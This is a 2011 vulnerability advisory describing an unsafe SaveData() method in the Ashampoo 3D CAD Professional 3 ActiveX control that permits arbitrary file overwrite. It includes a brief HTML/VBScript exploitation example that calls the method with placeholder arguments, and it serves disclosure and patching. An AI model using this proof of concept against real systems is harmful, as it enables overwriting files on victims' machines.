Stay in touch

Enter your email and get the latest news and researches on cybersecurity, receive invitations to private security events and conferences.

Ashampoo 3D CAD Professional 3 ActiveX control Insecure Method

Advisory ID:HTB23019
Product:Ashampoo 3D CAD Professional 3
Vendor:Ashampoo GmbH & Co
Vulnerable Versions:3.0.1 and probably prior
Tested Version:3.0.1
Advisory Publication:June 7, 2011 [without technical details]
Vendor Notification:June 7, 2011
Public Disclosure:June 28, 2011
Latest Update:June 28, 2011
Vulnerability Type:Exposed Unsafe ActiveX Method [CWE-618]
Risk Level:Critical
CVSSv2 Base Score:9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Ashampoo 3D CAD Professional 3 ActiveX control which could be exploited to compromise vulnerable system.

1) Insecure method in Ashampoo 3D CAD Professional 3 ActiveX Control
The vulnerability is caused due to the Cygnicon.ViewControl.1 (CyViewer.ocx) ActiveX control including the insecure "SaveData()" method. This can be exploited to overwrite arbitrary files on the target system with privileges of the current user.

Exploitation example:
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
target.SaveData arg1 ,arg2
End Sub

ImmuniWeb® On-Demand Web Application Penetration Test

Upgrade to 3.0.2 or later version.

[1] High-Tech Bridge Advisory HTB23019 - - Ashampoo 3D CAD Professional 3 ActiveX control Insecure Method
[2] Ashampoo 3D CAD Professional 3 ActiveX control - – An ActiveX control for Ashampoo 3D CAD Professional.
[3] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
User Comments and Opinions
Add Comment

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.